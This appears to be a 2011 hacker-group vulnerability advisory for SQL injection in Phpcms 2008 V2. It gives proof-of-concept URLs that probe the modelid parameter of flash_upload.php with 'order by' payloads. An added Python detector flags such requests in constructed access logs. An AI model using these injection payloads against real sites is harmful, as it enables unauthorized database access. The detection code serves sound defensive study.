-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Merciful}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

[~] Type: REMOTE SQL iNJECTioN
[~] Vendor: www.phpcms.cn

[+] Software: Phpcms 2008 V2
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: Xp10_hACKEr & 403-T3AM
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 17.jan.2011
[?] T!ME: 05:15 am GMT
[?] Home: WwW.XP10.COM
[^]? Xp10_hAcKEr
[?]

======================================================================================
# REMOTE SQL iNJECTioN Vulnerabilities
======================================================================================

[*] Err0r C0N50L3:

http://server/bbs/phpcms_th/flash_upload.php?modelid= EV!L INJECT!ON

[*] Proof of concept =

http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+20-- (false)

http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+19-- (TruE)

Already Tested on Win Xp
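
Added example, not part of the original advisory: a detection check for the probing shown above, run over constructed access-log lines. It flags requests to flash_upload.php whose modelid is not a plain integer; the integer-only expectation, the Combined Log Format layout and all names in the code are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate modelid is a plain decimal integer.
VALID_MODELID = re.compile(r"\d{1,10}")
# Client IP and request target from a Common/Combined Log Format entry.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Tokens that mark a rejected value as SQL syntax rather than a typo.
SQL_HINT = re.compile(r"\b(order\s+by|union|select)\b|--|/\*|'", re.I)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [17/Jan/2011:05:10:01 +0000] "GET /bbs/phpcms_th/flash_upload.php?modelid=1 HTTP/1.1" 200 512
203.0.113.9 - - [17/Jan/2011:05:15:02 +0000] "GET /bbs/phpcms_th/flash_upload.php?modelid=1+order+by+20-- HTTP/1.1" 200 0
203.0.113.9 - - [17/Jan/2011:05:15:04 +0000] "GET /bbs/phpcms_th/flash_upload.php?modelid=1%20order%20by%2019-- HTTP/1.1" 200 512
198.51.100.7 - - [17/Jan/2011:05:16:00 +0000] "GET /bbs/index.php?modelid=abc HTTP/1.1" 200 900
"""

def suspicious_modelid_requests(log_text, script="flash_upload.php"):
    """Return (ip, modelid, reason) for requests to `script` with a non-integer modelid."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/" + script):
            continue  # a different script; out of scope for this check
        # parse_qsl decodes both '+' and %XX, so encoded variants look the same here.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() != "modelid" or VALID_MODELID.fullmatch(value):
                continue
            reason = "sql-syntax" if SQL_HINT.search(value) else "non-integer"
            findings.append((m.group("ip"), value, reason))
    return findings

if __name__ == "__main__":
    for ip, value, reason in suspicious_modelid_requests(SAMPLE_LOG):
        print(f"{ip}\t{reason}\tmodelid={value!r}")
```

The same integer-only rule applied to modelid before it reaches the query is the server-side counterpart of this check.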

[~]-----------------------------{((Xp10_hACkEr))}------------------------------------------------
#
#
[~] Greetz tO: [dolly &MERNA &po!S!ON Sc0rp!0N & ((hetlar jeddaH)) &(Nochelove) &emeliya & NEX ]
#
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ #
#
[~] special thanks : ((HITLER JEDDAH & rootshell& DR.DAShER& abo shahd &abo mohammed)) ALL XP10 MEMbers #
#
[?]special SupP0RT : MY M!ND # ?
#
[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((R3d D3v!L<---&--->JUPA<---aNd--->Devil ro0t)) #
#
[~]special FR!ND: XP10.COM -_-_- lurklife.com #
#
[~] !'M 4R48!4N 3XPL0!73R. #
#
[~]{[(D!R 4ll 0R D!E)]}; #
#
[~]---------------------------------------------------------------------------------------------